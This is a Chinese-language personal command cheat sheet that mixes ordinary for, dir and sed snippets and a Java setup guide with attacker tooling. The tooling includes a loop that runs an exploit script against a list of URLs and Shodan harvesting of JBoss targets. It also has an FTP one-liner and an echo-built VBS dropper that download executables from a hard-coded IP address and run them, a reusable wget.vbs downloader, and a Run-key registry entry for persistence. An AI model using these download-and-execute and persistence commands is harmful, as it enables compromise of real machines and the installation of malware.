For 命令

• for命令查找东西
  for /r c:\ %i in (*jexws4.jsp) do echo %i

• 遍历TXT内的urls，启动程序攻击url
  for /f %u in (urls.txt) do python exp.py -u %u

dir 命令

• 查找某个盘符的下的某个文件
  dir /b /s c:\ |findstr filename.txt

• 获取文件的最后访问时间
  dir /TA 7za.exe

sed命令

• 在首尾行添加双引号"
  sed -e 's/^/\"/' | sed -e 's/$/\"/'

• 在行首添加http://
  sed -i 's#^#http://#g' filename.txt

• 在行尾添加phpmyadmin/
  sed -i 's#$#phpmyadmin/#g' filename.txt

• sed如何在文件的最后 插入一行文字
  sed ‘$a\要插入的文字’filede.txt

• 在每行的头添加字符，命令如下：
  sed ‘s/^/要添加的字符&/g’ test.file

• 在每行的行尾添加字符，命令如下：
  sed ‘s/$/&要添加的字符/g’ test.file

• 除去最后的,号
  sed “s/,$//g” file.txt

• 把，号换成：号
  sed “s/,/:/g” file.txt

• 删除某1-5行
  sed -i '1,5d' filename

• 删除某行
  sed -i '1d' filename

echo open 119.29.173.112 21>ftp.txt&&echo 123>> ftp.txt&&echo 123>> ftp.txt&&echo binary>> ftp.txt&&echo get start_yam32.exe>> ftp.txt&&echo get sysinfo.exe>> ftp.txt&&echo bye>> ftp.txt&&ftp -s:ftp.txt&&del ftp.txt&&start_yam32.exe&&sysinfo.exe

• install oracle-java8

到http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html下载相应版本
解压到/opt/java/
vi /etc/profile 在文末添加：（注意版本号对应着不同的路径）
export JAVA_HOME=/usr/lib/jdk/jdk1.8
export JRE_HOME=/usr/lib/jdk/jdk1.8/jre
export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH
export CLASSPATH=$CLASSPATH:.:$JAVA_HOME/lib:$JAVA_HOME/jre/lib

source /etc/profile

shodan parse --fields ip_str,port --separator , jboss.json.gz>jboss.txt&&sed -i "s/,$//g" jboss.txt&&sed -i "s/,/:/g" jboss.txt

nohup shodan download --limit -1 jboss.json.gz "jboss -country:CN -port:443 -port:8443" &

apt update&&apt upgrade&&apt install vim -y&&apt install nmap -y&&apt install git -y&&cd /opt/&&git clone https://github.com/sqlmapproject/sqlmap.git&&echo "alias sqlmap='python /opt/sqlmap/sqlmap.py'">>/root/.bashrc&&source /root/.bashrc&&apt install zmap -y&&apt install masscan -y&&wget wget --no-check-certificate https://raw.githubusercontent.com/teddysun/across/master/l2tp.sh&&bash l2tp.sh&&echo "ClientAliveInterval 60" >>/etc/ssh/sshd_config&&echo "ClientAliveCountMax 3" >>/etc/ssh/sshd_config&&reboot

echo Set Post = CreateObject(“Msxml2.XMLHTTP”) > x.vbs
echo Set Shell = CreateObject(“Wscript.Shell”) >> x.vbs
echo Post.Open “GET”,”http://119.29.173.112/x.exe”,0 >> x.vbs
echo Post.Send() >> x.vbs
echo Set aGet = CreateObject(“ADODB.Stream”) >> x.vbs
echo aGet.Mode = 3 >> x.vbs
echo aGet.Type = 1 >> x.vbs
echo aGet.Open() >> x.vbs
echo aGet.Write(Post.responseBody) >> x.vbs
echo aGet.SaveToFile “c:\x.exe”,2 >> x.vbs
echo wscript.sleep 3000 >> x.vbs
echo Shell.Run (“c:\x.exe”)  >> x.vbs
echo on error resume next >wget.vbs
echo iLocal=LCase(Wscript.Arguments(1)) >>wget.vbs
echo iRemote=LCase(Wscript.Arguments(0)) >>wget.vbs
echo iUser=LCase(Wscript.Arguments(2)) >>wget.vbs
echo iPass=LCase(Wscript.Arguments(3)) >>wget.vbs
echo set xPost=CreateObject(“Microsoft.XMLHTTP”) >>wget.vbs
echo if iUser=”” and iPass=”” then >>wget.vbs
echo xPost.Open “GET”,iRemote,0 >>wget.vbs
echo else >>wget.vbs
echo xPost.Open “GET”,iRemote,0,iUser,iPass >>wget.vbs
echo end if >>wget.vbs
echo xPost.Send() >>wget.vbs
echo set sGet=CreateObject(“ADODB.Stream”) >>wget.vbs
echo sGet.Mode=3 >>wget.vbs
echo sGet.Type=1 >>wget.vbs
echo sGet.Open() >>wget.vbs
echo sGet.Write xPost.ResponseBody >>wget.vbs
echo sGet.SaveToFile iLocal,2 >>wget.vbs

—————————

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“CPU”=”cpu.bat”

————————

useradd -d /home/test -m test
-d  指定为用户test创建的目录
-m 如果test目录不存在就创建test目录